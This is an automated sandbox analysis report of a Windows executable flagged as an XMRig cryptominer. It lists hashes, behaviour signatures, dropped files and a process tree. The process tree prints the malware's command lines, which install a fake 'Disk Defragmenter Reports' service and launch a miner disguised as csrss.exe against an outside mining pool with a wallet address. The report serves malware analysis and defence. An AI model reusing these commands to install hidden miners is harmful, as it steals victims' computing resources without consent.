Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-12-2024 15:20

General

  • Target

    ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe

  • Size

    910KB

  • MD5

    ca0fb79fde083ec2ba5625c6d1c208d8

  • SHA1

    eb215b41f55ac1588d09354f5b1d32d5de92f248

  • SHA256

    ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229

  • SHA512

    e990977492d710767a1847782399ca8078cd74303afabe0a68469d3006ccd6125442cc72e12860f5c04b7cc16fd8e3ddbd3ad6b906abcbb9970d0ca239aebfc7

  • SSDEEP

    12288:SvfyIIIzAClE7uDOch+h2ul/mJot38gi5Y9ND3aHSkRcdT1/zdP1r:esSzlEqF+hVcOfi5YrDAWT9Bdr

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 5 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
    "C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe
      __IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\ProgramData\Temp\run64.bat
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4912
        • C:\ProgramData\Temp\svchost.exe
          C:\ProgramData\Temp\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\Temp\csrss.exe -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
          4⤵
          • Executes dropped EXE
          PID:3916
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2256
        • C:\Windows\SysWOW64\sc.exe
          sc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1392
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 2 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4932
        • C:\ProgramData\Temp\svchost.exe
          C:\ProgramData\Temp\svchost.exe start "Disk Defragmenter Reports"
          4⤵
          • Executes dropped EXE
          PID:2936
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 3 127.0.0.1
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4116
  • C:\ProgramData\Temp\svchost.exe
    C:\ProgramData\Temp\svchost.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\ProgramData\Temp\csrss.exe
      "C:\ProgramData\Temp\csrss.exe" -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=50
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Temp\csrss.exe

    Filesize

    413KB

    MD5

    9fb6eb5b8e72e6671765a91f12f273fb

    SHA1

    e476d2caaaf8506d8798cca874ab70f31a23a44f

    SHA256

    9a0db3da87598e4e38a40d8a49bf71e5f708fb3de3b044db0c17ab369041c1b4

    SHA512

    3e2188c99e6cc6dc9062896d628b5df834c629a7000040b46d640f495c93af27b3cf32ac6af8ea88a57e343d0dbb815658cfa6df6c62be8dee208373c9ef2fed

  • C:\ProgramData\Temp\run64.bat

    Filesize

    484B

    MD5

    39a4b61f3776e96201ff30b4f4a28afd

    SHA1

    f293bfe02dd2b058330dce8a3ddab23ac5ea708d

    SHA256

    27ed8d3eab67d1ce02e40542e18d8444f4a9e7989a02cb7f41baf88f9d544d02

    SHA512

    b0cb6592dd5dcac3b31ee6979d04eb564523da1903fe9b0bb47fc331c1af2557aafff9237ad9b9cd849fecbcde13fa482517048a96becaaa8ca58f7216b288c8

  • C:\ProgramData\Temp\svchost.exe

    Filesize

    345KB

    MD5

    1e706b1e8d3bd3764e3ee4bf5fe509d8

    SHA1

    ba457bfcdc1b66609f142c3578be647c51d1356d

    SHA256

    29f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74

    SHA512

    f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924

  • C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe

    Filesize

    440KB

    MD5

    75ca7ff96bf5a316c3af2de6a412bd54

    SHA1

    0a093950790ff0dddff6f5f29c6b02c10997e0c5

    SHA256

    d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1

    SHA512

    b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4

  • memory/1052-4-0x0000000000400000-0x0000000000527000-memory.dmp

    Filesize

    1.2MB

  • memory/1052-33-0x0000000000400000-0x0000000000527000-memory.dmp

    Filesize

    1.2MB